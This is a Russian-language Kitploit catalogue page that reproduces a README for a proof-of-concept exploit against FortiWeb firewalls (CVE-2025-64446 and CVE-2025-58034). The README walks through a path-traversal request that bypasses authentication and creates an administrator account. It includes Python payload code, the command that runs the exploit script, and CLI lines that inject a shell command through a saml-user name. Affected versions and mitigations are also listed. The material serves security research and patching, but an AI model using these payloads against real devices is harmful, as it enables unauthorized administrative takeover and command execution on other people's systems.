Skip to content
KitploitKITPLOIT
ИнструментыБлог
Log in
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
FORTIWEB_CVE-2025-64446-58034 — PoC-эксплойт для уязвимостей FortiWeb (CVE): обход аутентификации через обход пути и аутентифицированное внедрение команд ОС. Включает подробный анализ, полезные нагрузки и рекомендации по смягчению для тестирования безопасности. | Kitploit
Инструменты/GitHubGitHub/eagle-nett/fortiweb_cve-2025-64446-58034
Аутентификация и авторизацияАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubeagle-nett/fortiweb_cve-2025-64446-58034

FORTIWEB_CVE-2025-64446-58034

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

PoC-эксплойт для уязвимостей FortiWeb (CVE): обход аутентификации через обход пути и аутентифицированное внедрение команд ОС. Включает подробный анализ, полезные нагрузки и рекомендации по смягчению для тестирования безопасности.

Репозиторий
135 месяцев назадЕщё не проверено

Моделирование эксплуатации FortiWeb (CVE-2025-64446 & CVE-2025-58034)

Примечание:

  • Данный документ предназначен только для учебных целей и исследований в области безопасности.
  • Не используйте для атак на системы без соответствующего разрешения.

1. Обзор

FortiWeb — это устройство Web Application Firewall (WAF), используемое для защиты веб-приложений.

В 2025 году были обнаружены две серьёзные уязвимости:

  • CVE-2025-64446 – Обход аутентификации через Path Traversal
  • CVE-2025-58034 – OS Command Injection

2. Обзор CVE-2025-64446

ПунктСодержание
Тип уязвимостиRelative Path Traversal
Authentication Bypass
ПричинаFortiWeb нестрого обрабатывает пути до аутентификации:

- Контроль доступа на основе логической строки пути
- Отсутствие полной нормализации пути
- Допускает использование ../ для доступа к внутренним ресурсам
ОписаниеНекоторые административные конечные точки могут быть доступны без действительной аутентификации
Ущерб- Полный обход аутентификации
- Несанкционированный доступ к функциям администратора
- Нарушение модели разграничения прав
Затронутые версии- 8.0.0 – 8.0.1
- 7.6.0 – 7.6.4
- 7.4.0 – 7.4.9
- 7.2.0 – 7.2.11
- 7.0.0 – 7.0.11

Пример:

/api/v2.0/cmdb/system/../../../../../../cgi-bin/fwbcgi

3. Обзор CVE-2025-58034

ПунктСодержание
Тип уязвимостиOS Command Injection (CWE-78)
ПричинаFortiWeb небезопасно обрабатывает ввод при выполнении команд ОС:

- Отсутствие валидации ввода
- Отсутствие экранирования спецсимволов
- Прямая передача пользовательских данных в системные команды
ОписаниеУязвимость требует аутентификации, но позволяет внедрять системные команды
Ущерб- Непреднамеренное выполнение команд
- Доступ к системным ресурсам
- Нарушение целостности и доступности
Затронутые версии- 8.0.0 – 8.0.1
- 7.6.0 – 7.6.5
- 7.4.0 – 7.4.10
- 7.2.0 – 7.2.11
- 7.0.0 – 7.0.11

4. Процесс экспериментов (POC)

4.1. Подготовка среды:

python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt

Это помогает избежать конфликтов версий библиотек, обеспечивает стабильность рабочей среды и минимизирует влияние на систему.

venv-git

4.2 Эксплуатация

Payload

 cgiinfo_json = {
        "username": "admin",
        "profname": "prof_admin",
        "vdom": "root",
        "loginname": "admin"
    }
cgiinfo_b64 = base64.b64encode(json.dumps(cgiinfo_json).encode()).decode()
conn.request("POST", "/api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi", body=body_data, headers=headers)
        resp = conn.getresponse()
result = {
            'target': f"{host}:{port}",
            'status': resp.status,
            'user': username,
            'password': password,
            'success': resp.status == 200
        }

Запуск инструмента с помощью Python3:

python3 exploit.py <IP_target>
  • <IP_target>: IP-адрес здесь — это имя хоста устройства FortiWeb.

exploit

Получены имя пользователя и пароль -> выполняется вход

login

connect

Эксплуатация прошла успешно, создана новая учётная запись с правами администратора.

4.3 Эксплуатация CVE-2025-58034 после входа в учётную запись

После успешного входа с помощью вновь созданной административной учётной записи злоумышленник может использовать уязвимость внедрения команд после аутентификации через специально созданные запросы или напрямую через интерфейс командной строки FortiWeb CLI:

config user saml-user

edit "`id`" ## ввод команды здесь

set entityID http://foo

set service-path /foo

set enforce-signing disable

set slo-bind post

set slo-path /foo

set sso-bind post

set sso-path /foo

end

FortiWeb выйдет из строки конфигурации и выполнит команду id в процессе настройки saml-user.

5. Некоторые способы смягчения уязвимостей

  • Обновить FortiWeb до исправленной версии.
  • Ограничить доступ к интерфейсу управления.
  • Не экспонировать интерфейс управления в Интернет.
  • Проверять необычные учётные записи администратора.

6. Дополнительные справочные материалы

  • CVE-2025-64446 – https://nvd.nist.gov/vuln/detail/CVE-2025-64446
  • CVE-2025-58034 – https://nvd.nist.gov/vuln/detail/CVE-2025-58034
Скачать инструмент